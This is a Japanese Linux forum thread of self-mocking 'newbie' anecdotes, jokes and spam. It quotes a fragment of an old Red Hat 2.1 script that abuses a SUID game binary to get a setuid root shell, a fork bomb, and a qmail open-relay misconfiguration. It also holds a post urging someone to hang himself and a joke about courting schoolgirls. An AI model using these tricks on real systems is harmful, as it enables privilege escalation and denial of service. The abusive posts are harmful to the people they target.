X



トップページLinux
228コメント48KB
自分の厨房さをさりげなく出してみよう
0001厨房垢版NGNG
%vi hage
:%s/^M$//g
:wq

気分はハカー(プ
0002login:Penguin垢版NGNG
$ emacs crlf2lf
#!/bin/sh
if [ ! -x /usr/bin/nkf ]; then
echo "crlf2lf: Please install nkf"
exit 1
fi

if [ -z $1 ]; then
echo "usage: crlf2lf <filename>" >&2
exit 1
fi

if [ -f $1 ]; then
nkf -Lu $1 > $1.nkftemp
mv -f $1.nkftemp $1
exit 0
else
echo "crlf2lf: No such file"
exit 1
fi

C-x C-c
$ chmod 700 crlf2lf

気分はプログラマー(プ
0003ツンドラ狼垢版NGNG
すみません。消防なのでどこが面白いのか分かりません。
0007login:Penguin垢版NGNG
>>2
悦に入っていたところにqkcを知ったっていうオチ...?
0008Anonymous垢版NGNG
rootを奪取してみよう。

echo --- gain root on Redhat Linux 2.1
echo --- Cheking system vulnerability
if test -u /usr/lib/games/abuse/abuse.console
then
echo --- System appears vulnerable.
cd /tmp
cat << _EOF_ > /tmp/undrv
#!/bin/sh
/bin/cp /bin/sh /tmp/abuser
/bin/chmod 4777 /tmp/aduser
_EOF_
chmod +x /tmp/undrv
PATH=/tmp
echo --- Executing Abuse
・・・以下略

しまった! RH 2.1用書いちまった!
0009login:Penguin垢版NGNG
>>7
そう。
既に存在するものをわざわざ書いてしまった上に、自分で書いたもののほうが低機能だったと言うオチです。
0011login:Penguin垢版NGNG
>>8
スマソ
5.2から始めた厨房には理解できませぬ。
0012Anonymous垢版NGNG
>>11
RH 2.1には SGID/SUIDの深刻なセキュリティホールがあった
/usr/lib/games/aduse/aduse.console がそれである
上記のファイルを使えば60行程度のスクリプトでrootを奪取できるモノだった
>>8はその一部じゃ、現在ではもちろん通用しないがの
0013login:Penguin垢版NGNG
自作機にフロッペをインスツールしてみました。でも認識しません
ディスクトップに何も出てこないのです

マウンターを起動してみましたが、使い方がよくわかりませんでした
0014厨房垢版NGNG
ここの低能共は Win2k + Cygwin の最強さをわかってないらしい。(プ
「Winは糞」という馬鹿のひとつ覚えはもう聞きあきたね(プププ
結局のところ自分の無知まるだしでLinuxを使って賢いフリ(ププププププ

内心: われながら論理的で非の打ちどころのない文章だな (フ
0015login:Penguin垢版NGNG
Win2kで安定して動く、高機能なMP3プレーヤ知りませんか。
WinAmp入れましたが、2時間で落ちてしまい、xmmsはいう
までもなく、Macのitunesよりも遥かに劣る安定度しかあり
ません。
0016ちゅぼう垢版NGNG
ここの低能様は MacOS + MacMiNT の最強さをわかってないらしー
0017login:Penguin垢版NGNG
MacMiNTって何?
あ、関係ないけどlinuxって文字選択して中ボタン押すだけでコピペ出来るんだ。
今まで気づかなかった。我ながら見事な消防ぶり(自画自賛)
0019login:Penguin垢版NGNG
家のマシンは.rpmファイルをリアルプレーヤで開こうとします。
0020login:Penguin垢版NGNG
startx
0021login:Penguin垢版NGNG
xinit
0022login:Penguin垢版NGNG
FreeBSD で wheel グループでないと su できないのがわからなくて慌てたた。
0023login:Penguin垢版NGNG
いっつもLIだったのが
010101010101010101…
と症状が変わって嬉しかった
0024login:Penguin垢版NGNG
NICの2枚挿しがしたいんですけど・・・。
0025login:Penguin垢版NGNG
bind9.1.xになってからnamedってゆープロセスがたくさん立って困ってるんです。
killした方がよかですか?
0026login:Penguin垢版NGNG
FreeBSDでディレクトリのchmodするときって、chmod go+rx /home/hogehoge/
みたいにケツのスラッシュが必ず要るのね。
0027login:Penguin垢版NGNG
管理者にvim6入れて、と言おうと思ったけど
小心者で言えなかったので、とりあえずhomeに入れた私は
厨房認定でしょうか?
0028login:Penguin垢版NGNG
Linuxのリソ−スのほとんどをエロに
当てている僕は厨房ですね。
0030login:Penguin垢版NGNG
MIDI ファイルを解析&作成するためだけに、16進ダンププログ
ラムと、そのダンプリストからバイナリファイルを作るプログ
ラムを作ってしまった。バイナリエディタ拾ってくればいいも
のを....
しかも、気が付いたら dehex が n進数から文字列、コメント
まで対応した妙なものになっていた.... 厨でしょ。
0031login:Penguin垢版NGNG
「西村理香」とか「プチトマト」という名前のディレクトリがある。
厨房ですね。
0032login:Penguin垢版NGNG
>>31

炉浬はあまりにアトミックですよ。ウラン柄杓ですくって掻き回してるみたい
でヤバいですよ。っていうか、少年は大人に惹かれるものですよ。
寝小便してそうなガキは興味無しですよ。[Kumiko_Takeda]とか
[Kanoh_Sisters]というディレクトリならあります。
0033login:Penguin垢版NGNG
つーか、工口を格納するディレクトリはとりあえず
. (ドット)を先頭に付けておくべきである。
0034login:Penguin垢版NGNG
>>33
".. "(ドットドットスペース)みたいなディレクトリなら、
もっと良いかも。
0035login:Penguin垢版NGNG
つうか普通、やばいのは不可視コード使うだろ。
0036login:Penguin垢版NGNG
過去に回答があったぞ
/mntに置いといて、使わないときは何かマウントしとけば完璧
0037login:Penguin垢版NGNG
>>30
それ便利かも!

と、さりげなく厨房発言。
0038login:Penguin垢版NGNG
ダンプって何だよダンプって
ダンプは車だろ、アホな事書いてねーで学業or仕事しろや

# なかなか痛くて厨(wara
0040login:Penguin垢版NGNG
は〜ぁ。これだから何も分かってない厨房は…
ダンブといえば松本に決まってるだろうが。
0041login:Penguin垢版NGNG
あん?
もしかして dumpって書いてダンプて
読むとでも?
004330垢版NGNG
40まではセンス良かったのに、、、
意味不明になっちゃったのでさげ。
0045荒井厨垢版NGNG
LINUXにはPSというフリーソフトがあるが、何故PSとい
う名称なのか?

それはLINUXで動作しているタスクの事をpsと呼ぶからで
ある。*BSDではprocessと呼ぶそうであるが、これは
歴史的な経緯でそう呼ばれているだけに過ぎず、実はこれは誤り
である。

# (フッ…決まったな)
# なんだバカヤロ
0046login:Penguin垢版NGNG
平謝りである
0050実体験だ・・・(恥垢版NGNG
Qmailはセキュリティに強いですが、強すぎてそのままではメールを出せません。
これで悩んだ諸兄!俺は見つけました!(優越感ゾクゾク)
以下のようにしましょう!!

* tcpserver経由でqmail.smtpを呼ぶ場合のコマンドライン例*
# /usr/local/bin/tcpserver -v -u 1007 -g 101 -x /etc/tcp.smtp.cdb 0 smtp /var/qmail/bin/qmail-smtp

* 上記tcp.smtp.cdbの作り方*

# tcprules tcp.smtp.cdb tcp.tmp < tcp.smtp.src

* tcp.smtp.srcの内容 *
------------------------
allow,RELAYCLIENT=""
------------------------

はい!これでQmailでメールが出せます!わははははっ!!
あぶないsendmailなど捨てて、真のセキュアで高速なMTAの実力を味わいましょう!
0051sendmailer垢版NGNG
>>50
私のような厨房には意味がわかりません。
解説求む。
0053hanajan@特科連χ ◆aNrYiVLI垢版NGNG
>>1->>50
僕は、大タコな貧乏中年@hageなので、誰か優しく教えて下さい。
できれば、優しいお姉さんを希望します。
あ、僕的には、若い眼鏡美人が好みです。

希望した答えでないと、僕、暴れちゃうかも知れません。
005452垢版NGNG
>>53

私は含まれないと言うことですね。残念...
0056hanajan@特科連χ ◆aNrYiVLI垢版NGNG
>>54
いや〜
眼鏡かけていなくてもイイよ。。。

>>55
あの〜
僕、ドキュソなので、トリップって何なの〜ワカラナイーです。。。バタバタ
期待した答えが返ってこないと、焼き鳥にしちゃうぞ〜
0058login:Penguin垢版NGNG
>>50
ネタにマジレスするのもアレなんだが、それだとやっぱりメールは出せないぞ。

$ cat env.sh
#!/bin/sh
set
↑こういうシェルスクリプトを作って、

$ tcpserver -x tcp.smtp.cdb 127.0.0.1 10000 /somewhere/env.sh
で起動して、
$ telnet localhost 10000
を実行したときに、RELAYCLIENT がどうなるか見てみるとよい。

ってゆーか、↓こうやっちゃったんだよね。コロン重要。

:allow,RELAYCLIENT=""

これだと open relay になって spammer がわらわらやってくる。>>51
0060login:Penguin垢版NGNG
どこが厨房なんだ?

ある意味、漢のように思われ。>>59
0061basashi垢版NGNG
厨房ってなんですか?
はじめて来たんですけど意味が分からない言葉が多くって。
0062login:Penguin垢版NGNG
>>61
おまえのことだよ。ププ
0063basashi垢版NGNG
了解!
0065basashi垢版NGNG
突然odnからtomato2cn@yahoo.com.cn (TOMATO)
のmailがとんできました。そのあといきなりipchains
がすべてDENYになってしまいました。
やられちゃったみたいです。みなさんすごい人達なんです
ね?おてやわらかに。
0067login:Penguin垢版NGNG
25 17 * * 5 echo 'kernel panic: hogehoge'
0068login:Penguin垢版01/10/08 19:42ID:JLpukcbo
ここを使うか・・・・・
0070login:Penguin垢版01/10/10 00:00ID:aW85.XPI
ねえねえお隣さん。
お醤油貸してくださいな。
0071login:Penguin垢版01/10/10 02:33ID:v68sQ4g.
人名は出したくないが悪寒の走る68だな
0072login:Penguin垢版01/10/10 10:03ID:xmiyC5.g
すいません、ASCII コードって何メートルですか?
0073login:Penguin垢版01/10/10 10:22ID:0k9B.iRQ
>>72
0x00 - 0xFF まであるので 256 メートルです。
0076login:Penguin垢版01/10/16 14:45ID:VcJ2CudT
わたしは自分のことをハッカーだと思い込んでいます。
0077login:Penguin垢版01/10/17 00:29ID:vNNhLtWx
このスレ下がんないな。なぜだろ?
0079login:Penguin垢版01/10/17 00:44ID:StwVUYqz
>>78
違うよ?
LinuxとかUnixのXだよ(まじれす)
008180垢版01/10/17 00:51ID:14B4A2r8
自分にレスしてしまった。
0082login:Penguin垢版01/10/17 00:52ID:9nVcm6i5
>>78
そんなわけないでしょ。なに逝ってるんですか。
X ってのはマンガですよ、マンガ。
0085login:Penguin垢版01/10/17 01:37ID:StwVUYqz
>>46
板違い
0088login:Penguin垢版01/10/18 02:51ID:ppRoBIag
皆さん初めまして。私はLinux初心者のlogin:Penguin
と申します。
実は今、レポートとしてちょっとしたCGIを作っているのですが
どうやって作ったらいいか解らずに困っています。
簡単なMLっぽいやつなのですが・・・
提出期限は今週末です。
本当に困っています。
スキルをお持ちの皆様、ご指導宜しくお願いします。

# ML取ってると、こんな厨メール来るよな
0089login:Penguin垢版01/10/18 13:35ID:xUr6OdWE
とりあえず見積もり送ってやれよ
0090login:Penguin垢版01/10/22 19:07ID:eYLQ+z8U
>>89
その前に要求分析が必要と思われ

でも、かなりの金額書いてDM送ってやるのも面白いかも(w
0092login:Penguin垢版01/11/22 19:55ID:5UUIu72v
WindowsXPの尻持ってる人いますか?
0093rm -rf *.*垢版01/11/25 17:33ID:pr4Bq87Z
WindowsXPはどこにありますか。
できればrpmがいいです。急いでます。
0094login:Penguin垢版01/12/13 12:51ID:vBckb3pG
age
0095login:Penguin垢版01/12/13 13:02ID:gyGl78yX
X Windows

全角もミソ。
0096login:Penguin垢版01/12/14 01:29ID:8M/QfNFt
私のパソコンはLinuxのCDROMを入れてもアイコンが出ません。
CDROMの中身は開けなかったり開けるものもありますが英語で良くわかりま
せん。
でもハッカーになりたいです。
どうしたら良いでしょうか。
初歩的質問でもうしわけありません。
0097login:Penguin垢版01/12/14 01:45ID:31HRYmQS
>>95
う〜ん、まだまだ。

「X Windows」

全角半角ごちゃ混ぜ。これが厨の書き方。

# どうすりゃこんな変な書き方になるんだ? マヂ厨の方、解説キボーン
0099login:Penguin垢版01/12/14 02:45ID:t7OGJSzh
お前らの3CGソフト上げろゴルァ!
0103login:Penguin垢版02/04/26 07:51ID:v+jm7/ig
女子中学生を口説きたいね♥
なんて、sageてみるテスト
0104login:Penguin垢版02/04/26 08:30ID:5L1X3fJ/
apacheがいくら頑張ってもインスツール出来ない漏れ
0106RedFat垢版02/04/26 22:57ID:Exd0UEf9
RHAP受けた先輩からBlackのRedHatロゴ入りのキャップをもらって
喜ぶ漏れ
0107login:Penguin垢版02/04/26 23:27ID:UqjpWVgK
PowerBookにLinuxをインストールしようとして
必死にfdiskして「パーティションが見えねぇ!」って騒いだ俺。

今までIntel Insideなマシン以外は
空栗鼠とかフィオリーナたん萌えしか触ってなかったので・・・(言い訳)。
0108login:Penguin垢版02/04/26 23:40ID:C6L8VYig
赤帽ってRedHatのことって昨日知った俺。
0109RedFat垢版02/04/26 23:44ID:Exd0UEf9
紅旗LinuxってRedFlagLinuxのことだと昨年知った俺。
0111login:Penguin垢版02/04/27 06:46ID:p1JrDRgi
aliasでbyebye=shutdown -h nowって設定すれば
byebyeだけで終了できるYO!
0112login:Penguin垢版02/04/27 07:58ID:UC7URC5i
Linuxのインストロール成功したけど何に使ったらいいんだろう。
みんなが何にLinux使ってるかってスレ立てていい?
0114112垢版02/04/27 09:35ID:UC7URC5i
>>113
それ、厨房っぽくない・・・・
0115login:Penguin垢版02/04/27 12:38ID:CSMYp5ww
>>105
ありがとう、ネタじゃないのが厨房の証さ・・・鬱
0116login:Penguin垢版02/05/21 21:41ID:vRCAonOs
startxでエラーがでると再インスコする漏れ
0119login:Penguin垢版02/05/22 15:06ID:C05NWTBO
ねぇ、ねぇ、Mozillaがtar玉でnautilusが赤玉のときnautilus-mozillaに
Mozillaを認識させるのにはどうしたらいいの?
0120login:Penguin垢版02/05/22 17:09ID:M0vjq9Pf
hosts.denyで全部塞いでhosts.allowを直さないでlogoutしました....
0121login:Penguin垢版02/05/24 01:21ID:NWyWt5bX
みんなLinux使えるんだ。
レベル高いね。
0122login:Penguin垢版02/05/26 09:00ID:optI/63G
RED HAT 7.1 インストールしてここ来たけど
これからLinuxで何をするか決まってないのが悩み
まあ、まだなにもわからないけどね。
0123login:Penguin垢版02/05/27 04:49ID:WeDdqxXl
update.redhat.comからwget -r してきたrpmを
rpm -Fvh *.rpm
でアップデートしようとすると、rpm なんちゃら以上が必要だと言われるんだけど。
で、rpm自体をアップデートしようとすると、glibcがうんちゃらって言われて……。
で、glibcアップデートしようとするとrpm なんちゃら以上が……って言われて、
永久にアップデートできましぇーん。
--nodeps --forceっすか?
0124login:Penguin垢版02/05/28 00:28ID:ItL7H64f
>>120
それと似たコトをルータでやりましたよ マジで
0125login:Penguin垢版02/05/28 17:06ID:I8YPq6kJ
インターネットがみれません。
設定とかしないとだめですか?
0126login:Penguin垢版02/06/05 19:11ID:kXSlwO0V
インストールできたのでもう満足
だってLinuxとかデュアルブートとか言ってればまわりに自慢できるじゃん
0127login:Penguin垢版02/06/05 19:19ID:9n+AFSXB
>>123
必要なパッケージを全部そろえて一斉にアップデートしろ。
間違っても --nodeps とかすんじゃねぇぞ。
>>126
それもまたヨシ。
0128login:Penguin垢版02/06/05 19:25ID:ovyPC4DE
root権限でCGIファイルのユーザとグループをnobodyに書き換えようとして、
chown nobody:nobody *
とやったら、カレントディレクトリがCGIファイルの入ってるとこより
1階層上でした。
0129login:Penguin垢版02/06/05 19:42ID:ovyPC4DE
>>124
そのあとどうしたの?
0130login:Penguin垢版02/06/05 20:15ID:5XxveQoT
OpenSSHをバージョンアップしようとして、その前にOpenSSLから
コンパイルしたら、OpenSSHが動かなくなっちゃった。make install
した瞬間に切断。で、二度とつながらない。telnetは塞いである。

っつーわけで、2時間かけてコンソールの前まで出向きましたとさ。
0131login:Penguin垢版02/06/05 21:05ID:Hlw+yHtR
Apache使えた、もう何も思い残す事はない。
誰かroot権奪取して漏れの代わりに管理してくれ。
0132login:Penguin垢版02/06/05 21:14ID:DrdXg7fC
bind4でクラスレスの設定にはまった。
おもいっきしバカにされた。
0133login:Penguin垢版02/06/06 02:38ID:LvHY2EIJ
こんばんは
じ です

こんばんはマシン室からです
0134login:Penguin垢版02/06/06 23:35ID:iCUwET2c
RedHatインストールしたら・・・
とりあえず高校のC言語の課題でもぼちぼちと・・
0135login:Penguin垢版02/06/09 22:44ID:uwqtelH5
Alphaにインストールするやり方がわからない・・・
600aにどうやって入れるんだ〜
0136名無しさん@Emacs垢版02/06/16 17:05ID:BtDUEfRh
>>135
ネタだかマジだかわからんが、某アルファなまるちさんに聞けば。
Hard板のアルファスレにいるから探してみ。
0137login:Penguin垢版02/07/17 00:05ID:dRNH/g4I
   ↓←←←←←←北
 コンナノハジメテ...      
     ↑  
西→→↑     Σ真中"      ↓←東
              ポツーン    ↓
                  ↓
          南       ↓
            ↓       →→→→→→→→→→→→外
           タッチャン...
0138login:Penguin垢版02/07/25 21:00ID:Ike9T6kM
昔、.bashrc に
kon
とかいてえらい目にあいました。
0139login:Penguin垢版02/07/26 05:18ID:Nn/nwyRt
#/usr/bin/perl
@filelist = `ls *.txt`;
@data = `cat data.txt`;
........
0140login:Penguin垢版02/09/08 15:37ID:mYcfuBtX
昔 .bash_profile に
xinit
とかかいてえらい目にあいますた。
0142login:Penguin垢版02/09/08 17:54ID:mjh5EUYo
昔、某メインフレームのUnixで
$ cat > abone.c
main() { for (;;) fork(); }
^D
$ cc abone.c -o abone
$ ./abone
とやった。みんな覚えたての頃ってやるよね?
0143login:Penguin垢版02/09/09 17:04ID:HGrVtrqz
犬板見てるだけでcpu idleが50を切りますが何か
0147名無しさん垢版03/01/03 00:05ID:cDFqouOT
        / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄\
Λ_Λ  | 君さぁ こんなスレッド立てるから          |
( ´∀`)< 厨房って言われちゃうんだよ             |
( ΛΛ つ >―――――――――――――――――――‐<
 ( ゚Д゚) < おまえのことを必要としてる奴なんて         |
 /つつ  | いないんだからさっさと回線切って首吊れ     |
       \____________________/

(-_-) ハヤクシンデネ… (-_-) ハヤクシンデネ… (-_-) ハヤクシンデネ…
(∩∩) (∩∩) (∩∩)

(-_-) ハヤクシンデネ… (-_-) ハヤクシンデネ… (-_-) ハヤクシンデネ…
(∩∩) (∩∩) (∩∩)

(-_-) ハヤクシンデネ… (-_-) ハヤクシンデネ… (-_-) ハヤクシンデネ…
(∩∩) (∩∩) (∩∩)
0148IP記録実験垢版03/01/08 21:47ID:DJ5zDJa+
IP記録実験
http://qb.2ch.net/test/read.cgi/accuse/1042013605/

1 名前:ひろゆき ◆3SHRUNYAXA @どうやら管理人 ★ 投稿日:03/01/08 17:13 ID:???
そんなわけで、qbサーバでIPの記録実験をはじめましたー。

27 名前:心得をよく読みましょう 投稿日:03/01/08 17:20 ID:yL/kYdMc
SETTING.TXT管轄でないということは全鯖導入を視野に、か?

38 名前:ひろゆき ◆3SHRUNYAXA 投稿日:03/01/08 17:22 ID:rLfxQ17l
>>27
鋭いです。

73 名前:ひろゆき ◆3SHRUNYAXA 投稿日:03/01/08 17:27 ID:rLfxQ17l
>ところで、IPが抜かれて何か今までと変わることってあるのでしょうか?
・今までより、サーバが重くなる。
・裁判所や警察からの照会があった場合にはIPを提出することがある。
0149login:Penguin垢版03/01/09 01:37ID:5dI2J0HT
キャップでの書き込みは?やっぱりIPとられるの?
0150login:Penguin垢版03/01/09 02:21ID:q9hbllRT
ヲチ板住人としては、突撃厨排除のためにも、早期導入を願いたいところ
0152login:Penguin垢版03/01/09 03:55ID:qciTMwbB
とりあえず、満喫からでも書きこめるようだから、
告発なり何ありしたい人は、そこから書き込めば、
自宅や職場から100`以上離れたところで。
0154login:Penguin垢版03/03/13 22:48ID:MRYC6k3z
ニヤニヤ(・∀・)
0155login:Penguin垢版03/03/14 04:12ID:E1JHy1hL
ごめんぽ、僕まだBINDで苦戦してる.
0156login:Penguin垢版03/03/14 17:49ID:PwV6yLod
シェルって何ですか?
0158login:estimate垢版03/03/31 19:19ID:dMrzO/QP
一度に申し訳ないですが、どしても2つほど重大な疑問があります。

ひとつに、ホームディレクトリ raou から /doc と /man (サブディレ
クトリを含む意味で */doc としたんですが)のみを指定し、文字列 h
-idebu を含むファイルを検索しようと!ってものです。

( find `/raou \( -path */doc -o -path */man \) -type f | xargs -n 10 grep -H hidebu 2> /dev/null ) | less

いくつか検討したんですが、何が間違ってるのですか。


もうひとつ、ハッカーって何をする人ですか。

よろしくお願いしますm(_ _
0159login:Penguin垢版03/03/31 19:24ID:LL/rFYAD
>>158

人を殴ったり蹴ったり暴れたりする人のことだよ。
あと酒癖がよくない人もな。
0160login:Penguin垢版03/03/31 19:36ID:LL/rFYAD
一生懸命勉強して
インストールしてサーバーを建てたりそふとをインストールしたものの
そこからどうしたらいいのかわからなくなって考えた末気づきました
使い道がありましせんでしたWindowsに帰ります
0161login:Penguin垢版03/03/31 19:39ID:LL/rFYAD
書き込んだあと自分の日本語がおかしいことに気づきました
さらにsageした意味がないことにも気づきました
0162login:estimate垢版03/03/31 20:12ID:1UbM9QtT
ホームディレクトリ raou から /doc と /man (サブディレクトリを含
む意味で */doc としたんですが)のみを指定し、文字列 hidebu を含
むファイルを検索しようと!ってものです。

( find `/raou \( -path */doc -o -path */man \) -type f | xargs -n 10 grep -H hidebu 2> /dev/null ) | less

結果が得られず終了。
いくつか検討したんですが、何か間違ってるのですか。

>>159

ありがとうございます。
過去の全てから解放されました。

>>160

フォローありがとう。
君にはそれで十分。

>>161

みんな見てる〜\ ̄∇ ̄)/
0163login:Penguin垢版03/03/31 23:05ID:ZTxsSF1n
>>162

(;´Д`)ヒッ
すみませんでしたわたしがわるぅございました
だからマジ蹴りは勘弁してください
蟹とワインも勘弁してください
0164login:Penguin垢版03/03/31 23:21ID:4AwxODT0
スレタイが一瞬
「自分の女房をさりげなく出してみよう」
に見えました。駄目だ、俺……
0167山崎渉垢版03/04/20 06:10ID:X64WTq1+
   ∧_∧
  (  ^^ )< ぬるぽ(^^)
0168login:Penguin垢版03/04/21 23:12ID:rFKy+TOL
hdparm であそんでいたら死んでしまいました
あげなおしたらpanicになりました
母艦につなげてfsckしてもなおりませんでした
knoppix使ったら必要なファイルのバックアップだけはとれました
kernel2.2だったので2.4のを入れ直しました
pcmciaとLANカード、pppのモジュールとかで半日以上は悩みました
ipchainsとiptablesの違いで悩みました
JFの一発と はやいルータを作る スレでなんとかなりました
今は小人がピンポンしています
0169山崎渉垢版03/05/22 02:18ID:p4opmoqv
━―━―━―━―━―━―━―━―━[JR山崎駅(^^)]━―━―━―━―━―━―━―━―━―
0170山崎渉垢版03/05/28 16:55ID:3t6i6zxR
     ∧_∧
ピュ.ー (  ^^ ) <これからも僕を応援して下さいね(^^)。
  =〔~∪ ̄ ̄〕
  = ◎――◎                      山崎渉
0171おざなりさん垢版03/06/13 18:53ID:lXAGRVIY
起動中にSCSIケーブル引っこ抜いた。(´Д`)y-~~
HDD三台の内一台ROMが飛んだ。
ローレベルフォーマットすらできなくなった。
しかし、一応三台とも正常に動作はしている。
意外と丈夫だと感動した。(´Д`)y-~~
0172山崎 渉垢版03/07/15 11:32ID:2JhhXBQM

 __∧_∧_
 |(  ^^ )| <寝るぽ(^^)
 |\⌒⌒⌒\
 \ |⌒⌒⌒~|         山崎渉
   ~ ̄ ̄ ̄ ̄
0173ぼるじょあ ◆yBEncckFOU 垢版03/08/02 05:29ID:GfRe8vK7
     ∧_∧  ∧_∧
ピュ.ー (  ・3・) (  ^^ ) <これからも僕たちを応援して下さいね(^^)。
  =〔~∪ ̄ ̄ ̄∪ ̄ ̄〕
  = ◎――――――◎                      山崎渉&ぼるじょあ
0174山崎 渉垢版03/08/15 23:21ID:ep0zwfOh
    (⌒V⌒)
   │ ^ ^ │<これからも僕を応援して下さいね(^^)。
  ⊂|    |つ
   (_)(_)                      山崎パン
0177login:Penguin垢版04/03/23 18:59ID:YCzOKbTw
KANとCANは違うのですか?
0179まじで初心者垢版04/03/30 01:22ID:zE44NIME
 IPNutsでNAT+簡易ファイアウォール作ってます。

 で、eth0のINで、情報が入ってくる、のIN=家の外側の回線だよね。
インターナルじゃないよね。(^^;

 いまだに繋げない・・・。
0180 垢版04/05/14 19:47ID:ETz9hlyw
0181login:Penguin垢版04/07/24 18:02ID:Qged7sdR
自分の厨房のようなチソチソをさりげなく出してみるスレはここですか?

皮が…。
0182login:Penguin垢版04/07/24 21:04ID:HQ3Wq6d1
>>181
ちんちんじゃないが

きゅお、40センチのうんちがでたぜ
0183login:Penguin垢版04/07/24 21:58ID:Qged7sdR
>>182
それのどこが「厨房のような」のか小一時間(ry
0184login:Penguin垢版04/07/24 23:34ID:ju6NZTYv
>>164
  _  ∩
( ゚∀゚)彡 うp!うp!
 ⊂彡
0187login:Penguin垢版04/07/25 00:00ID:pVEArPrW
kochiフォントは高知出身ですか?
0188login:Penguin垢版04/07/25 07:50ID:Q9iHzshf
Debian package
Software Packages in "unstable", doc section

anarchism (9.7-1)
無政府主義理論とその実践に関する網羅的な調査
0190login:Penguin垢版04/07/25 12:35ID:XV9NQG53
?    /?⌒ヽ ?
 ? /?_ゝ?) ????????-・・・
  | ?   /
?  | /|? |
  // | ?|
 U?  .U ?
0191login:Penguin垢版04/08/01 00:39ID:Uc0gqLfV
今日赤帽9インスコしたぜ!しかも言語は英語でXはインスコせず!
う〜ん、できる漢って感じがするぜ!


さて、どうしよう・・・・orz
0192login:Penguin垢版04/09/06 22:29ID:MAbEPDId
CもDも全部開放しちゃってLinux専用マシンにしちゃうってのはアリ?
0193login:Penguin垢版04/09/23 03:37:09ID:UqOp+de3
このところセキュリティ関係の更新をまったく適用してません。
ルータの内側の外から見えないマシンだしいいかなー、なんて。
0195login:Penguin垢版2005/07/11(月) 03:41:30ID:elJWU2bv
 
0197login:Penguin垢版2006/07/16(日) 01:06:15ID:ek9xsTyR
無線LANを使うから
カーネルコンフィグのときに
良く知らないのにそれっぽい物をチェックする俺
0200Socket774垢版2007/10/13(土) 22:38:42ID:MeMiPNGV
   _ _
  ( ゚∀゚)
  (  ∩ミ  edora! edora!
   | ωつ,゙
   し ⌒J
0202login:Penguin垢版2009/08/25(火) 21:50:44ID:GC29NByQ
どうでもいいけどなんでUNIXじゃなくてUnixなのか、
とか気づく余地もないんだろうな。
0203login:Penguin垢版2011/03/13(日) 18:38:57.90ID:9SOV0w7X
>>1
てかcshかzshじゃねーかよ
bash使え
0208login:Penguin垢版2014/07/24(木) 19:15:26.10ID:+GCcxC9R
★2ch勢いランキングサイトリスト★

◎ +ニュース板
・ 2NN
・ 2chTimes
◎ +ニュース板新着
・ 2NN新着
・ Headline BBY
◎ +ニュース板他
・ Desktop2ch
・ 記者別一覧
◎ 全板
・ 全板縦断勢いランキング
・ スレッドランキング総合ランキング
◎ 全板実況込み
・ 2勢
・ READ2CH
・ i-ikioi

※ 要サイト名検索
0212login:Penguin垢版2015/03/30(月) 19:36:11.85ID:lb8MDC3v
man mount (笑)
0213login:Penguin垢版2015/09/22(火) 12:47:26.21ID:7Z63jSeS
名前欄に!5sizeと入ると理想の彼女が…
0214【B:85 W:102 H:70 (A cup) 143 cm age:11】 垢版2015/09/22(火) 12:47:56.93ID:7Z63jSeS
テスト
0216login:Penguin垢版2016/04/15(金) 23:03:42.88ID:/uBpTRe/
カーネルって聞いてみんなはケンタをイメージするんだろ?
オレは違うんだよな〜

だってさw
0217login:Penguin垢版2016/07/31(日) 23:47:09.55ID:Euidr3pR
クロームとかアンドロイドはリナックスだから無料なんだよ
0218login:Penguin垢版2017/07/10(月) 03:51:14.96ID:YwZ+60fd
uname -r
0219login:Penguin垢版2017/07/21(金) 22:19:03.65ID:ZjpLkZVk
ハゲに生きる資格なし!!
0220login:Penguin垢版2017/07/22(土) 20:22:10.73ID:iVFr0hOa
うるさいハゲ
さっさとクソしてハゲろ!
0222login:Penguin垢版2017/12/29(金) 14:24:02.75ID:S/CsVkMC
誰でも簡単にパソコン1台で稼げる方法など
参考までに、
⇒ 『宮本のゴウリエセレレ』 というブログで見ることができるらしいです。

グーグル検索⇒『宮本のゴウリエセレレ』

JTQS7M7AKP
0224login:Penguin垢版2018/05/22(火) 10:46:37.69ID:Czl6p0FW
僕の知り合いの知り合いができた副業情報ドットコム
関心がある人だけ見てください。
グーグルで検索するといいかも『ネットで稼ぐ方法 モニアレフヌノ』

Z83BS
0228login:Penguin垢版2022/09/02(金) 06:51:58.25ID:VSNoFpNF
Windowsのデザインはふつうにカコイイ(キリッ
Linuxはなんかイマイチだな(キリッキリッ
とか書くのがスレに相応しいのかね
レスを投稿する


ニューススポーツなんでも実況